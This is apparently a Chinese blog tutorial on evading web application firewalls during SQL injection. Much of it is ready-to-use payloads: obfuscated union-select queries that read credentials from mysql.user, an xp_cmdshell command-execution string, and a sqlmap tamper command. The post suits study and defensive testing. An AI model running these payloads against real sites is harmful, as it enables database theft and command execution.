waf绕过之——waf注入绕过

最新推荐文章于 2024-04-23 10:05:03 发布
最新推荐文章于 2024-04-23 10:05:03 发布
阅读量1.4k 收藏 15
点赞数
分类专栏: web渗透测试与代码审计 #+ waf绕过 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105825299
版权

waf注入绕过

这样算是面试过程中比较经典的一个问题了

网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。
功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。

能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。主要是防一些网络层和传输层的攻击

目录

分类

软件

装在主机侧(服务器)上
比较出名的安全狗就是其中之一

硬件

创建在企业中
用户访问网站都要经过

云waf

知道真实IP地址可以过

				很多公司不是全部域名都上了云waf

利用泛域名获取真实IP
开启之后,任何域名都可以解析,可以解决暴力破解
也就是可以通过一个不存在的二级域名访问网站比如wdedx.baidu.com
开启泛域名有一个缺点
这时候不管是CDN还是WAF都是直接到真实IP
也就是我们通过ping一个随意的二级域名,就可以找到真实IP了

同时也可以利用burp中插件bypass waf
注意burp任何插件安装后都要在项目选项,会话处理进行配置
可以伪造本地访问

waf硬件软件功能是差不多,像一个防火墙一样,创建在企业链路上,基本是企业必备的,按域名收费

WAF简介

网站WAF是一款服务器安全防护软件,是为IDC运营商、虚拟主机服务商、企业主机、服务器管理者等用户提供服务器安全防范的实用系统,是集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。

常见的系统攻击分为两类:
一是利用Web服务器的漏洞进行攻击,如DDOS攻击、病毒木马破坏等攻击;
二是利用网页自身的安全漏洞进行攻击,如SQL注入攻击、跨站脚本攻击等。常见攻击方式对网站服务器带来的危害主要集中在病毒木马破坏、网页非法篡改、各类网络攻击带来的威胁。

waf注入绕过检测方法

要实现绕过首先让我们了解一下waf防御流程

waf检测阶段流程

在这里插入图片描述

WAF身份认证阶段的绕过

身份认证阶段
WAF是有一个白名单的,在白名单内的客户请求将不做检测

绕过方法一:伪造搜索引擎
老版本的WAF是有这个漏洞的,就是把User-Agent修改为搜索引擎,便可以绕过,进行sql注入等攻击, 这里推荐一个火狐插件,可以修改User-Agent,叫User-Agent Switcher
现在不可以了

绕过方法二:伪造白名单特殊目录
之前360webscan有这个缺陷,现在也不行了

绕过方法三:直接攻击源站
这个方法可以用于一些云WAF,云WAF的原理:通过DNS解析到云WAF,访问网站的流量要经过指定的DNS服务器解析,然后进入WAF节点进行过滤,最后访问原始服务器,如果我们能通过一些手段(比如c段、社工)找到原始的服务器地址,便可以绕过

数据包解析阶段的绕过(主要是正常解析情况)

(1)编码绕过
最常见的方法之一,可以进行urlencode
早期的方法,现在效果不是太好
(2)修改请求方式绕过
最典型的修改请求方式绕过,很多的asp,aspx网站都存在这个问题,有时候WAF对GET进行了过滤,但是Cookie甚至POST参数却没有检测。
(3)复参数绕过
例如一个请求是这样的

GET /pen/news.php?id=1 union select user,password from mysql.user

可以修改为

GET pen/news.php?id=1&id=union&id=select&id=user,password&id=from%20mysql.user

很多WAF都可以这样绕,测试最新版WAF能绕过部分语句
(4)WAF触发规则的绕过
WAF在这里主要是针对一些特殊的关键词或者用法进行检测。绕过方法很多
绕过策略一:特殊字符替换空格
用一些特殊字符代替空格,比如在mysql中%0a是换行,可以代替空格,这个方法也可以部分绕过最新版本的WAF,在sqlserver中可以用/**/代替空格,也可以使用如下方法:

http://192.168.0.142:8080/sql.php?id=1/*|%23--%23|*/union/*|%23--%23|*/select/*|%23--%23|*/1,user(),3,4,5

http://192.168.0.142:8080/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/1=2

绕过策略二:特殊字符拼接
把特殊字符拼接起来绕过WAF的检测,比如在Mysql中,可以利用注释/**/来绕过,在mssql中,函数里面可以用+来拼接
如:GET /pen/news.php?id=1;exec(master…xp_cmdshell ‘net user’)
可以改为:GET /pen/news.php?id=1; exec(‘maste’+‘r…xp’+’_cmdshell’+’“net user”’)

绕过策略三:注释包含关键字
在mysql中,可以利用/!/包含关键词进行绕过,在mysql中这个不是注释,而是取消注释的内容。测试最新版本的WAF可以完美绕过。
如: GET /pen/news.php?id=1 union select user,password from mysql.user
可以改为: GET /pen/news.php?id=1 /!union/ /!select/ user,password /!from/ mysql.user
现在不可以

绕过策略四:特殊符号
尝试seelct~ select~1 select! select@等绕过成功

(5):空格替换法
把空格替换成%0a/**/可以绕过最新版本WAF, 在Pangolin中 点击 编辑-- 配置-- 高级-- 选择替换空格使用-- 填上%0a/**/即可

http://192.168.0.142:8080/sql.php?id=1%20union%23%0aselect%23%0a1,user(),3,4,5

(6)关键字替换

http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

此方法适用于一些会把union select替换掉的WAF,经过WAF过滤后就会变成 union select 1,2,3,4....

(7)编码与注释结合

http://www.***.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

http://192.168.0.142:8080/sql.php?id=1/*!50000*/union/*!50000*/select/*!50000*/1,user(),3,4,5

http://192.11.22.55/sqli/Less-1/?id=1' and /*!1=1*/ %23 (WAF不拦截)

U替换为%55,S替换为%53 在 union 和 select 之间添加注释/**/
手工进行加注释进行注入太慢,一般我们通过Sqlmap这类工具来实现自动注入:

sqlmap.py -u "URL" --tamper="versionedmorekeywords.py" --dealy=1

(8)利用WAF本身的功能绕过
假如你发现WAF会把"*"替换为空,那么你就可以利用这一特性来进行绕过http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....
其它方法-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)
(9)使用其他变量或者命令对注入语句进行替换

COMMAND | WHAT TO USE INSTEAD
	@@version | version()
		concat() | concat_ws()
			group_concat() | concat_ws()
					= | like

				**还有就是把or '1=1' 改成更复杂的例如-1=-1**

(10)组合绕过waf
先判断注入点,把and为&&,urlencode后为%26%26

http://192.168.0.102:8080/sql.php?id=1%20%26%26%20-1=-2

具体讲解绕过方法
1.利用()代替空格
2.利用mysql特性/!/执行语句
3.利用/**/混淆代码
注入语句

							union/*%00*//*!50010select*/(database/**/()),(user/**/())%23
							id=1/*|%23--%23|*/unioN/*|%23--%23|*/sElect/*|%23--%23|*/1,     
							user(),(database/**/()),4,5
							http://192.168.0.102:8080/sql.php?id=1 
							union/*%00*//*!50010select*/1,user(),version(),4,5

注意
1.mysql关键字中是不能插入/**/的,即se/**/lect是会报错的,但是函数名和括号之间是可以加上/**/的,像database/**/()这样的代码是可以执行的
2./!/中间的代码是可以执行的,其中50010为mysql版本号,只要mysql大于这个版本就会执行里面的代码
3.数据或者函数周围可以无限嵌套()
4.利用好%00

补充

IP地址黑名单,在生产环境中有很多公司选择关闭这一功能,一方面是误封率很高,另一方面因为正常用户IP被攻击者伪造利用

waf针对于get防护度是很高的,很多选项默认开启,但是cookie post很多功能并不开启,现在没有一个安全厂商可以做到全部功能开启,资源占用量太大,所以一般只检测常见问题
因此在绕过的时候尽量避免get请求

小结:整体思路还是比较庞大的,按照整体防御思路进行绕过来记忆吧,感觉WAF跟DNS有一点异曲同工之处,查了一下,可以结合起来做防御,今天还学了点木马免杀,总结就不发了,问为什么的就赶紧远离好吧在这里插入图片描述

温柔小薛
关注
  • 0
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
实战 WAF-Bypass之SQL注入绕过思路总结
dzqxwzoe的博客
12-01 1012
WAF攻防研究之四个层次Bypass WAF那些可以绕过WAF的各种特性waf从入门到Bypasshttp://github.wh0ale.xyz/2019/12/04/waf从入门到Bypass/干货|各种WAF绕过手法学习利用分块传输绕WAF技术讨论 | 在HTTP协议层面绕过WAF
(46.3)【WAF绕过】基于WAF的规则绕过、旁路、waf、白名单
05-13 1061
WAF绕过】针对规则绕过
WAF的识别、检测、绕过原理与实战案例
2301_81250923的博客
11-30 1116
WAF通过配置DNS解析地址、软件部署、串联部署、透明部署、网桥部署、反向代理部署、旁路部署等获取攻击流量,基于规则进行攻击特征匹配,或利用其他方式进行攻击检测及阻断。
WAF HTTP协议覆盖+分块传输组合绕过
LuckySec
03-02 6484
0x01 HTTP协议覆盖介绍 HTTP协议覆盖绕过是更换Content-Type类型来绕过WAF的检测,⽬前很多WAF对Content-type类型是⾸要的检测点。利用【multipart/form-data】协议的⽅法,更改Content-type的类型为【multipart/form-data】和构造【multipart/form-data】请求内容,当WAF没有规则匹配该协议传输的数据时可被绕过。 Content-Type(MediaType),即是Internet Media Type,互联网媒体
WAF详解及WAF绕过
赤赤三的博客
03-20 8285
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
WAF绕过思路
永远是少年
03-12 3425
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
WAF绕过思路整理(挺全)
weixin_50464560的博客
10-23 7154
转载至:https://harmoc.com/secnote/waf%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86.html WAF绕过思路整理 <div class="entry-meta"> <ul class="post-meta"> <li><span class="posted-on"><time class="entry-date p
SQL注入WAF绕过注入
weixin_54105551的博客
07-03 2302
本文主要讲的是如何绕过WAF的基础知识,写的不好,请多多见谅。
安恒月赛 image up
weixin_30900589的博客
11-30 527
http://101.71.29.5:10007/index.php?page=login 仔细观察这个url的话会发现,存在文件包含。 而且并没有login.php而是login,猜测代码是 <?php include str."php"; 随便账号密码就能登陆,来到了一个上传页面,只能上传图片,回头看看题目 这里的思路明确了,文件包含加图片马。 在这时间统一的世界里,上传图...
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式WAF)等绕过方式。适合初学者进行学习,不适合高手。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本内容是否安全--最终版
qq_39951524的博客
04-22 450
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本你在前端测试时,最好使用**小程序工具的真机调试**,是可以跑通的,但你用**小程序工具的真机预览模式**就会没有响应。原因就在于访问**wx.request({})**,中的**服务器网址** ,需要在**小程序开发管理** 》》**开发设置** 》》 **服务器域名** 中配置,而小程序提供的接口**https://api.weixin.qq.com** ,又恰恰**不允许**在服务器域名中配置,
账号安全基本措施2
2301_78327423的博客
04-19 459
例如:配置zhangsan用户只能执行挂载命令,/usr/bin/mount /dev/sr0 /mnt/命令。在110行我们看到在这个组中,NOPASSWD:ALL,是要加入到wheel组中的,使用sudo执行任何命令不需要密码。第三列是开放的命令,比如:/usr/bin/mount /dev/sr0 /mnt/只能执行这一条命令。在/etc/sudoers.d/下写一个配置文件:vim /etc/sudoers.d/test。测试别名的使用,只有在/usr/bin/下的命令才可以无密码使用。
vue2 顶象 安全 验证码的使用
最新发布
lele66688888的博客
04-23 185
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 884
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
网站被SmartScreen标记为不安全怎么办?
Racent_Y的博客
04-22 533
在互联网时代,网站的安全性和可信度是用户选择是否继续访问的重要因素之一,然而,网站运营者偶尔会发现使用Edge浏览器访问网站时,会出现Microsoft Defender SmartScreen(以下简称SmartScreen)提示网站不安全的情况。旨在通过以上措施,尽可能的减少网站被SmartScreen标记为不安全的可能,让网站可以正常显示,从而使用户重新建立起对网站的信任,提高用户访问量和浏览量。这里的服务器证书指的就是可以实现网站HTTPS的SSL证书,且要使用在有效期内的。
waf绕过cookie
08-09
WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中,修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中,WAF可能对GET请求进行了过滤,但对Cookie甚至POST参数没有进行检测。因此,攻击者可以通过修改请求方式为POST或使用复参数来绕过WAF的检测。这样,攻击者可以绕过WAF对Cookie的防护,从而对网站进行攻击。123 #### 引用[.reference_title] - *1* *2* *3* [waf绕过之——waf注入绕过](https://blog.csdn.net/weixin_43079958/article/details/105825299)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值